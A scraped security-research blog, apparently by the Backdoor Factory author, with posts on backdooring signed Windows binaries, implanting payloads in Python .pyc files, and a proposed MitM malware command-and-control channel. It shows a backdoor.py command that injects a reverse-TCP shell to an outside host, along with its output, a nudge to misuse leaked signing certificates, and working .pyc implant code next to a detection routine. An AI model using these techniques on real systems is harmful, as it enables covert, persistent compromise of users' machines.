<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjMNVonhkkQQjp3eaHiDRGYoZRwmyjolQEL_N35ki_FMKq2Cq15ysHLooZ31a5LFQZfXY7J1C_tmAG8ccgh900YaHwGIzodzfOfbgx372cxifcSwOYcxQwCPA9LNEcxFA6ji9bgIj5AWs/s1600/BDF_signing_after.png" imageanchor="1"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjMNVonhkkQQjp3eaHiDRGYoZRwmyjolQEL_N35ki_FMKq2Cq15ysHLooZ31a5LFQZfXY7J1C_tmAG8ccgh900YaHwGIzodzfOfbgx372cxifcSwOYcxQwCPA9LNEcxFA6ji9bgIj5AWs/s640/BDF_signing_after.png" width="640" /></a></div>
<br />
After this mod to BDF you should see the following after running a similar command:<br />
<br />
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
./backdoor.py -f tcpview.exe -s iat_reverse_tcp_inline -H 172.16.186.1 -P 8080 -m automatic</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
__________ __ .___ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
\______ \_____ ____ | | __ __| _/____ ___________ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
| | _/\__ \ _/ ___\| |/ // __ |/ _ \ / _ \_ __ \ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
| | \ / __ \\ \___| </ /_/ ( <_> | <_> ) | \/</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
|______ /(____ /\___ >__|_ \____ |\____/ \____/|__| </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
\/ \/ \/ \/ \/ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
___________ __ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
\_ _____/____ _____/ |_ ___________ ___.__. </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
| __) \__ \ _/ ___\ __\/ _ \_ __ < | | </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
| \ / __ \\ \___| | ( <_> ) | \/\___ | </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
\___ / (____ /\___ >__| \____/|__| / ____| </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
\/ \/ \/ \/ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal; min-height: 14px;">
<br /></div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
Author: Joshua Pitts</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
Email: the.midnite.runr[-at ]gmail<d o-t>com</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
Twitter: @midnite_runr</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
IRC: freenode.net #BDFactory</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal; min-height: 14px;">
</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
Version: 3.2.4</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal; min-height: 14px;">
</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] In the backdoor module</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Checking if binary is supported</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Gathering file info</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Reading win32 entry instructions</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Gathering file info</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Overwriting certificate table pointer</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Loading PE in pefile</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Parsing data directories</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Looking for and setting selected shellcode</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Creating win32 resume execution stub</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Looking for caves that will fit the minimum shellcode length of 87</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] All caves lengths: 145, 162, 87</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Attempting PE File Automatic Patching</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[!] Selected: 50: Section Name: .data; Cave begin: 0x44cc5 End: 0x44d6b; Cave Size: 166; Payload Size: 162</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[!] Selected: 32: Section Name: .text; Cave begin: 0x3a304 End: 0x3a399; Cave Size: 149; Payload Size: 145</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[!] Selected: 45: Section Name: .rdata; Cave begin: 0x3fba0 End: 0x3fc46; Cave Size: 166; Payload Size: 87</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Changing flags for section: .rdata</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Changing flags for section: .text</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Changing flags for section: .data</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Patching initial entry instructions</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Creating win32 resume execution stub</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Looking for and setting selected shellcode</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
Succeeded</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
File tcpview.exe is in the 'backdoored' directory</div>
<div>
<br /></div>
<div>
Note the 'Succeeded'.</div>
<div>
<br /></div>
<div>
As expected, here's the result with a valid signature from Atheros:</div>
<div>
<br /></div>
<div>
<a href="https://www.virustotal.com/en/file/3707714825a8829666d3f116eabac73aa965c0e93532fca78d5078b8c5445f0b/analysis/1450322931/">https://www.virustotal.com/en/file/3707714825a8829666d3f116eabac73aa965c0e93532fca78d5078b8c5445f0b/analysis/1450322931/</a></div>
<div>
<br /></div>
<div>
This can be done with any PE code signing cert that is <strike>released</strike> leaked to the public. Get creative! If you think this should be part of BDF, let me know on <a href="https://twitter.com/midnite_runr">twitter</a> or <a href="https://github.com/secretsquirrel/the-backdoor-factory">github</a>.</div>
<div>
<br /></div>
<div>
Cheers.</div>
<br />
<br />midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com10tag:blogger.com,1999:blog-1658879437550643598.post-16448891502666802422015-11-09T18:58:00.000-08:002015-11-09T18:58:16.220-08:00Backdooring Python via PYC ( /ˈpiː/ - /ˈwaɪ/ - /ˈsiː/)Hello Again.<br />
<br />
It's been a while.<br />
<br />
Believe it or not, I have not been on a distant island selling 0days and stock options.<br />
<br />
While working on some python internals and source code review, I thought, how easy would it be to backdoor python after OS exploitation or some other form of access?<br />
<br />
The answer is "really easy." But you want to stay hidden, not in plain sight, and within the constructs of what is already on disk. This assumes you have root access and that the machine has python installed.<br />
<br />
And it is all via the pyc file. I'm not talking about patching python itself with <a href="https://github.com/secretsquirrel/the-backdoor-factory">BDF</a>. That could be easier to catch.<br />
<br />
/*<br />
Also before I forget, most of this blog post was written before I found the right google search term for prior research and work. Here's what I found:<br />
<br />
<ul>
<li><a href="https://www.virusbtn.com/virusbulletin/archive/2011/07/vb201107-reversing-Python#id3072912">https://www.virusbtn.com/virusbulletin/archive/2011/07/vb201107-reversing-Python#id3072912</a></li>
<li><a href="https://github.com/jgeralnik/Pytroj">https://github.com/jgeralnik/Pytroj</a></li>
<li><a href="http://www.slideshare.net/iamit/infecting-python-bytecode">http://www.slideshare.net/iamit/infecting-python-bytecode</a></li>
</ul>
<div>
<br /></div>
<div>
The prior work in the Pytroj GitHub repo includes pyc bytecode infection that, for python27, spreads to the other pyc bytecode loaded by the program.</div>
<br />
*/<br />
<br />
As most of you know, pyc files are Python bytecode, created either when a file is imported (by the interpreter or by another module) or by calling python -m compileall [path]..<br />
<br />
... or py_compile...<br />
<br />
When a Python file is run and a pyc file is present for it, Python checks the timestamp four bytes into the pyc file; if it equals the modified time of the parent py file, the cached pyc is loaded and is not overwritten. That's it. That's all the integrity checking for python27. Python3.X adds a check that the source size recorded in the header is correct. You can simply copy the size over from the old pyc file to your new pyc file. That's really the only time it is checked. To restore the child pyc file you need to either delete the pyc file or modify the parent. Running compileall again (without -f) will not modify the child pyc, as the recorded timestamp will be the same as the parent's.<br />
<br />
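The header check above is easy to exercise. The script below is an added example written for this post; it is not the backdoor-pyc POC and not CPython code. It targets Python 3 (on 3.7+ the header is magic, flags, mtime, size; on 3.3 to 3.6 there is no flags field; 2.7 has only magic and mtime, which this code does not handle). It forges a .pyc whose mtime and size fields are copied from an untouched .py, imports the module to show the loader accepts the cached bytecode instead of recompiling, and then runs the check the post is really asking for: recompile the .py and compare code objects, because a matching header proves nothing. The victim module and the payload are constructed for the demo.<br />

```python
import importlib
import importlib.util
import marshal
import os
import struct
import sys
import tempfile

HEADER_LEN = 16 if sys.version_info >= (3, 7) else 12   # PEP 552 added a 4-byte flags field


def header_for_source(source_path):
    """Header the loader expects for a timestamp-validated .pyc of source_path:
    the parent .py's mtime and size, both truncated to 32 bits like the loader does."""
    st = os.stat(source_path)
    mtime = int(st.st_mtime) & 0xFFFFFFFF
    size = st.st_size & 0xFFFFFFFF
    fields = (0, mtime, size) if HEADER_LEN == 16 else (mtime, size)   # flags=0: timestamp mode
    return importlib.util.MAGIC_NUMBER + struct.pack("<%dI" % len(fields), *fields)


def parse_header(pyc_path):
    """(magic, mtime, size) recorded in an existing .pyc."""
    with open(pyc_path, "rb") as f:
        head = f.read(HEADER_LEN)
    mtime, size = struct.unpack_from("<II", head, HEADER_LEN - 8)
    return head[:4], mtime, size


def write_pyc(source_path, code):
    """Write code as the cached .pyc for source_path with a header copied from the .py."""
    pyc_path = importlib.util.cache_from_source(source_path)
    os.makedirs(os.path.dirname(pyc_path), exist_ok=True)
    with open(pyc_path, "wb") as f:
        f.write(header_for_source(source_path))
        f.write(marshal.dumps(code))
    return pyc_path


def implant(source_path, payload_source):
    """Compile payload + original source into one code object and cache it.
    The .py is never touched, so its mtime and size still match the forged header."""
    with open(source_path) as f:
        original = f.read()
    code = compile(payload_source + "\n" + original, source_path, "exec", dont_inherit=True)
    return write_pyc(source_path, code)


def pyc_matches_source(source_path):
    """Defender-side check: recompile the .py and compare code objects with what the
    .pyc carries. This is the step the post notes nobody does."""
    pyc_path = importlib.util.cache_from_source(source_path)
    with open(pyc_path, "rb") as f:
        cached = marshal.loads(f.read()[HEADER_LEN:])
    with open(source_path) as f:
        fresh = compile(f.read(), source_path, "exec", dont_inherit=True)
    return cached == fresh


def demo(directory=None, module_name="victim_pyc_demo"):
    """Create a clean module, implant its .pyc, then import it: the loader takes the
    cached bytecode because the header agrees with the untouched .py."""
    directory = directory or tempfile.mkdtemp()
    sys.modules.pop(module_name, None)
    source_path = os.path.join(directory, module_name + ".py")
    with open(source_path, "w") as f:
        f.write("VALUE = 1\n")                                  # constructed victim module
    write_pyc(source_path, compile("VALUE = 1\n", source_path, "exec", dont_inherit=True))
    clean_matches = pyc_matches_source(source_path)
    pyc_path = implant(source_path, "IMPLANTED = True")          # constructed payload
    sys.path.insert(0, directory)
    importlib.invalidate_caches()
    module = importlib.import_module(module_name)
    magic, mtime, size = parse_header(pyc_path)
    st = os.stat(source_path)
    return {
        "clean_pyc_matches": clean_matches,
        "implanted_pyc_matches": pyc_matches_source(source_path),
        "module_value": module.VALUE,
        "implant_ran": getattr(module, "IMPLANTED", False),
        "magic_ok": magic == importlib.util.MAGIC_NUMBER,
        "header_matches_py": mtime == int(st.st_mtime) & 0xFFFFFFFF and size == st.st_size,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-24s %r" % (key, value))
```

Two caveats worth knowing. First, compileall's --invalidation-mode checked-hash (3.7+) swaps the timestamp check for a hash of the .py, but that hash covers the source, not the bytecode, so a root-level attacker just computes the same hash over the unmodified .py and the implanted body is still accepted; neither mode validates the code object itself, which is why the recompile-and-compare step above is the only real check. Second, the implant compiles payload and original together, so line numbers in tracebacks shift; the POC the post links patches the existing code object instead, which this example does not reproduce.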
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ucFowh-KP9Ha4jDteaVgDl4f8gG7bk2M6pV0AGr5rDTDZjQUq3zkl8e0qjtMLjum1GtYUgL_2_4VH-5v9Xh6pNlVC6_YTwNykIJmXBgPiKw1HjKO-QPknfxaXg_Wq9OSStgfsyoM_Qk/s1600/timestamp.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ucFowh-KP9Ha4jDteaVgDl4f8gG7bk2M6pV0AGr5rDTDZjQUq3zkl8e0qjtMLjum1GtYUgL_2_4VH-5v9Xh6pNlVC6_YTwNykIJmXBgPiKw1HjKO-QPknfxaXg_Wq9OSStgfsyoM_Qk/s640/timestamp.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Checking Modified Timestamps</td></tr>
</tbody></table>
<br />
<br />
The POC that I have is for python 2.7 and python3.X, and you can get it here: <a href="https://github.com/secretsquirrel/backdoor-pyc/">https://github.com/secretsquirrel/backdoor-pyc/</a><br />
<br />
You may be asking yourself so what? Someone could just update the python code directly.<br />
<br />
You are right. Here have a cookie.<br />
<br />
However, when was the last time you decompiled your python bytecode because you thought it was modified from the original python file?<br />
<br />
OK. How does it work?<br />
<br />
I've selected ./Lib/utf_8.pyc as my code to patch in python2.7. Why? Because when watching python load via python -v, it's one of the later modules to load, so once I modify it with a payload, most of the modules that I need are already available to use.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrf1xY4ApwEJuf6uceLmOAEPpRuv4wZDODbJGIBgL2eJtMEWwEggJ7gN7ThDg6v4rFWby190BI-l_Qi8f_VboNUY1c2WmecLBz20lMCrd3eiOu_j45_Xb1nkb-PgWJdLYp773lBygvFbo/s1600/python2.7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrf1xY4ApwEJuf6uceLmOAEPpRuv4wZDODbJGIBgL2eJtMEWwEggJ7gN7ThDg6v4rFWby190BI-l_Qi8f_VboNUY1c2WmecLBz20lMCrd3eiOu_j45_Xb1nkb-PgWJdLYp773lBygvFbo/s640/python2.7.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
For python3.X, you are better off going with the rlcompleter.py.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO2uTou-WOJok2IvctGzoW8oW3_UvLknEcLaGR1PwqWsd5C7RxP9Cvqg6GUN32PNs5xofZA7eeleewB72kBocyMCn4I9j1n1UM0qTBO0dJD-2JaAFXodVWB7U_BCviKKsS_Qf8oB0ZuE/s1600/python3.5_loaded_mods.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO2uTou-WOJok2IvctGzoW8oW3_UvLknEcLaGR1PwqWsd5C7RxP9Cvqg6GUN32PNs5xofZA7eeleewB72kBocyMCn4I9j1n1UM0qTBO0dJD-2JaAFXodVWB7U_BCviKKsS_Qf8oB0ZuE/s640/python3.5_loaded_mods.png" width="640" /></a></div>
<br />
<br />
I made a simple payload from a python shell (from trustedsec) and added multiprocessing to it so that python continues to execute after the shell has been spawned.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimGm944EzwgZJPOUXV0ryiutIlw6z0oYcSy024B9NdZebe6bzYDUA-vTleVBs3xa8GyBzWrMb8XiVjSZoNT1MPixNhXxppdwRb8-hwgUJ69kkW36Y7kINxFo4ZzZ0N1bBwA16Ei4PLNeo/s1600/payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimGm944EzwgZJPOUXV0ryiutIlw6z0oYcSy024B9NdZebe6bzYDUA-vTleVBs3xa8GyBzWrMb8XiVjSZoNT1MPixNhXxppdwRb8-hwgUJ69kkW36Y7kINxFo4ZzZ0N1bBwA16Ei4PLNeo/s640/payload.png" width="640" /></a><br />
<br />
First, the parent file is copied to /tmp/ and the POC is appended to the end of the py file. Then it is py_compiled to pyc. Next the timestamp and size (if 3.X) are modified to match the parent file. Finally the pyc file is copied to the original location beside the parent file, or into __pycache__ in python3.X.<br />
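A defender-side check for the behaviour described above, written for this post as an added example (it is not the PoC from the backdoor-pyc repo): it validates the pyc header the same way the import system does, then goes one step further and compares the marshalled code object against a fresh compile of the .py. It assumes the CPython 3.7+ header layout (PEP 552), which has a 4-byte flags field the 2.7 and pre-3.7 layouts in the post lack; the three sample files it builds are constructed in a temporary directory.

```python
"""Verify a .pyc against its .py beyond what the import system checks.

Added example for this post, not the PoC from the backdoor-pyc repo.  Assumes
the CPython 3.7+ header layout from PEP 552:

    bytes 0-4   magic number
    bytes 4-8   flags: 0 = timestamp-based, bit 0 set = hash-based
    bytes 8-16  timestamp-based: source mtime (u32) then source size (u32)
                hash-based:      SipHash of the source bytes
    bytes 16-   marshalled code object
"""
import importlib.util
import marshal
import os
import py_compile
import struct
import tempfile
from dataclasses import dataclass


@dataclass
class PycReport:
    magic_ok: bool    # magic matches the running interpreter
    header_ok: bool   # the only thing the import system validates
    code_ok: bool     # marshalled code equals a fresh compile of the .py

    @property
    def suspicious(self) -> bool:
        # The interpreter would load this file, yet its code does not come
        # from the source sitting next to it.
        return self.magic_ok and self.header_ok and not self.code_ok


def parse_pyc(data: bytes):
    """Split a .pyc into (magic, flags, 8-byte check field, marshalled body)."""
    if len(data) < 16:
        raise ValueError("truncated pyc header")
    flags = struct.unpack("<I", data[4:8])[0]
    return data[:4], flags, data[8:16], data[16:]


def verify_pyc(py_path: str, pyc_path: str) -> PycReport:
    with open(py_path, "rb") as f:
        source = f.read()
    with open(pyc_path, "rb") as f:
        magic, flags, check, body = parse_pyc(f.read())
    magic_ok = magic == importlib.util.MAGIC_NUMBER
    if flags & 0x1:
        header_ok = check == importlib.util.source_hash(source)
    else:
        st = os.stat(py_path)
        mtime, size = struct.unpack("<II", check)
        header_ok = (mtime == (int(st.st_mtime) & 0xFFFFFFFF)
                     and size == (st.st_size & 0xFFFFFFFF))
    try:
        # Code objects compare structurally (bytecode, constants, names,
        # line table), so recompiling the same source must compare equal.
        fresh = compile(source, py_path, "exec", dont_inherit=True)
        code_ok = marshal.loads(body) == fresh
    except Exception:
        code_ok = False
    return PycReport(magic_ok, header_ok, code_ok)


def self_check() -> dict:
    """Run verify_pyc over three constructed files: legitimate, tampered, stale."""
    with tempfile.TemporaryDirectory() as d:
        py = os.path.join(d, "mod.py")
        with open(py, "w") as f:
            f.write("def greet():\n    return 'hello'\n")
        legit = os.path.join(d, "legit.pyc")
        py_compile.compile(py, cfile=legit, doraise=True)
        reports = {"legit": verify_pyc(py, legit)}

        # Tampered: the real pyc's header (so mtime and size) in front of code
        # compiled from different source, the situation the post describes.
        with open(legit, "rb") as f:
            header = f.read()[:16]
        other = compile("def greet():\n    return 'tampered'\n", py, "exec", dont_inherit=True)
        tampered = os.path.join(d, "tampered.pyc")
        with open(tampered, "wb") as f:
            f.write(header + marshal.dumps(other))
        reports["tampered"] = verify_pyc(py, tampered)

        # Stale: the source grew by a line, so the size field no longer
        # matches and the interpreter itself would recompile.
        with open(py, "a") as f:
            f.write("VERSION = 2\n")
        reports["stale"] = verify_pyc(py, legit)
    return reports


if __name__ == "__main__":
    for name, report in self_check().items():
        print(f"{name:9s} {report}  suspicious={report.suspicious}")
```

Only the tampered file is reported as suspicious: the header check passes exactly as the post says it will, and the code comparison is what exposes it.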
<br />
Cheers.<br />
<a href="https://github.com/secretsquirrel/backdoor-pyc">Code</a>midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com3tag:blogger.com,1999:blog-1658879437550643598.post-45676923148686816512015-03-23T05:25:00.000-07:002015-03-23T05:25:14.446-07:00Yet Another Reason for HTTPS Everywhere: Internet Node Based Malware Command and Control Channels<div>
“The source of every crime, is some defect of the understanding; or some error in reasoning; or some sudden force of the passions. Defect in the understanding is ignorance; in reasoning, erroneous opinion.” </div>
<div>
― Thomas Hobbes, Leviathan</div>
<h3>
</h3>
<div>
<br /></div>
<h3>
Introduction</h3>
<div>
<br /></div>
<div>
As most of us know, many of the web sites and services we depend on across the Internet are unencrypted, including news, retail, sports, and entertainment. Each one of these sites and services unintentionally provides an avenue for a MitM command and control (C2) infrastructure. In this concept, it is the <b>traffic route</b> that is important, and the fact that it can be <b>modified</b>. Sites could be selected based on the crossing of C2 nodes along geographic lines or routing choke points, which could also help with locating the general area of infected machines. In addition, these sites would be normal in terms of user traffic and would not stand out from an initial DNS based forensic inquiry.</div>
<h3>
</h3>
<div>
<br /></div>
<h3>
The Concept</h3>
<div>
<br /></div>
<div>
Disclaimer: I have no proof this idea is in use as stated in this post. This is just a proposal of an idea.</div>
<div>
<br /></div>
<div>
A MitM malware Command and Control (C2) channel needs three things to exist:</div>
<div>
1.<span class="Apple-tab-span" style="white-space: pre;"> </span>Malware on an infected machine</div>
<div>
2.<span class="Apple-tab-span" style="white-space: pre;"> </span>That contacts servers via unencrypted or <a href="http://www.forbes.com/sites/thomasbrewster/2015/02/19/superfish-need-to-know/">decrypt-able</a> traffic</div>
<div>
3.<span class="Apple-tab-span" style="white-space: pre;"> </span>Which crosses a malicious node that could inspect and inject content into the traffic</div>
<div>
<br /></div>
<div>
Normal Traffic:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja4PFbQMJvXX_Ov1gRtuJ4ESz61v63NfRFV8fa_JKIhg9yGpmUmZvXnjObZUFIYBu66sUA0LcDmsXLtSzjOqv8epnN1uS2umfV0VGrKLqwYg8nh-RIbw4wc0nbh7QkmECtY4Ps_IeBT7I/s1600/normalTraffic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja4PFbQMJvXX_Ov1gRtuJ4ESz61v63NfRFV8fa_JKIhg9yGpmUmZvXnjObZUFIYBu66sUA0LcDmsXLtSzjOqv8epnN1uS2umfV0VGrKLqwYg8nh-RIbw4wc0nbh7QkmECtY4Ps_IeBT7I/s1600/normalTraffic.png" height="296" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Malware Communicating with a Malicious Node:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwDHH3n0PzsjqKi-vTFMiOU1pL1X319IwWvTHoczJZhvydHP7j2gC_19l23jw-1RsOaS2YW7hfefhbJB15W53bR46scKWTw8ggROJTLtt7Og9rqkyl-hIhW9lIuxFNFiaKbDwUtAZsd2s/s1600/mitmMalwareC2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwDHH3n0PzsjqKi-vTFMiOU1pL1X319IwWvTHoczJZhvydHP7j2gC_19l23jw-1RsOaS2YW7hfefhbJB15W53bR46scKWTw8ggROJTLtt7Og9rqkyl-hIhW9lIuxFNFiaKbDwUtAZsd2s/s1600/mitmMalwareC2.png" height="432" width="640" /></a></div>
<div>
</div>
<div>
<br /></div>
<div>
The MitM malware C2 concept is incredibly simple, but generally difficult to implement, and would be even more difficult to find in use. For a realistic attack, an adversary would need to implement the C2 code within an already existing infrastructure, particularly at advantageous nodes on the Internet. To solve this problem, let’s consider that a node being used for mass Internet surveillance is multipurpose. Besides traffic capture, the most obvious use is the modification of traffic to stop the flow of information that opposes the view of the political powers that <a href="http://en.wikipedia.org/wiki/Golden_Shield_Project">be</a> or for <a href="http://www.nytimes.com/2015/01/26/technology/verizons-mobile-supercookies-seen-as-threat-to-privacy.html?_r=0">corporate</a> <a href="http://blog.squarelemon.com/blog/2015/03/18/mitm-in-telecoms-networks-i-told-you-so-dot-dot-dot-sort-of/">interests</a>. Next is the MitM modification of <a href="https://www.leviathansecurity.com/blog/the-case-of-the-modified-binaries/">binaries</a> and code during download. Intelligence leaks have presented systems in place that could <a href="https://www.schneier.com/blog/archives/2013/10/how_the_nsa_att.html">re-route</a> client traffic to a server for end point exploitation. Finally I propose the possible implementation of a MitM malware C2 channel.</div>
<div>
<br /></div>
<div>
For an example, let us consider using HTTP for the channel.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTLX0oYB8rxbwysTrogZnGpVFCW8TxtOEDUgRNA1KzXz3O1t1Vqb8Id_-Hk_Vd40T7T_caVKfUJtwMQpm93ZaFMN8Woe1-iHrFIanqSvH0B7rcRrYeKkBemiKSfxK6cWuqVwpKXlkkiRU/s1600/httpExample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTLX0oYB8rxbwysTrogZnGpVFCW8TxtOEDUgRNA1KzXz3O1t1Vqb8Id_-Hk_Vd40T7T_caVKfUJtwMQpm93ZaFMN8Woe1-iHrFIanqSvH0B7rcRrYeKkBemiKSfxK6cWuqVwpKXlkkiRU/s1600/httpExample.png" height="215" width="640" /></a></div>
<div>
</div>
<div>
<br /></div>
<div>
The above diagram starts with an infected machine with malware (1) that is built to communicate via this infrastructure using HTTP GET requests. The malware can be designed to communicate directly out, spoofing its User-Agent during the request. Perhaps the malware works like <a href="http://www.forbes.com/sites/thomasbrewster/2015/02/19/superfish-need-to-know/">Superfish</a> or <a href="https://threatpost.com/privdog-poses-bigger-risk-than-superfish/111211">Privdog</a>, breaking secure communications. Or it could be designed to parse outbound traffic and modify or tag the HTTP <a href="https://labs.snort.org/papers/ua-analysis.html">User-Agent</a> header to a slightly different string, making it identifiable among other HTTP requests on the web. Furthermore, this malware will add an additional header (the name doesn't matter, as the <a href="http://tools.ietf.org/html/bcp178">specifications</a> allow flexibility) which will be used to pass encrypted data that is also base64 encoded. </div>
<div>
<br /></div>
<div>
Next the HTTP request traverses the Internet from routing node to routing node as it makes its way to the requested HTTP server. Along this path, a (2) Malicious/Evil Node inspects traffic for the unique User-Agent used by the malware. When the unique User-Agent request passes through this node, the C2 implementation tracks it, decrypts the encrypted message (if present), and waits for the response from the server. One idea is that it again slightly modifies the User-Agent to prevent other malicious nodes along the route from modifying the request. The modification could be as simple as removing the known tag from the User-Agent string.</div>
<div>
<br /></div>
<div>
The HTTP server (3) receives and (4) responds to the HTTP GET request.</div>
<div>
<br /></div>
<div>
The server’s HTTP response traverses back to the originating request (5), crossing the malicious node once again. As the response is handled, the malicious node injects a command for the malware into either the HTML content, as a comment with a unique tag, or an added unique HTTP response header that uses the same encryption scheme as the malware.</div>
<div>
<br /></div>
<div>
Finally the (6) HTTP response makes its way back to the originating machine; the malware either handles the response directly or intercepts it, parses it for encrypted commands, scrubs the modifications in memory, then presents the response back to the user. Depending on the command, the malware will wait (sleep) until the next predetermined beaconing (1) attempt to contact the MitM C2 Node with the results of the prior command, if necessary.</div>
<div>
<br /></div>
<div>
I’ve written a POC to test portions of my thoughts; the client and server are written in python, with the C2 using mitmProxy. After contemplation, I am not releasing the POC. I believe it would <b>not</b> be useful to the pentester outside of an attacker controlled wireless access point and otherwise difficult to implement. If I get enough feedback wanting a robust implementation, perhaps I'll build something.</div>
<h3>
</h3>
<div>
<br /></div>
<h3>
Anti-Forensics</h3>
<div>
<br /></div>
<div>
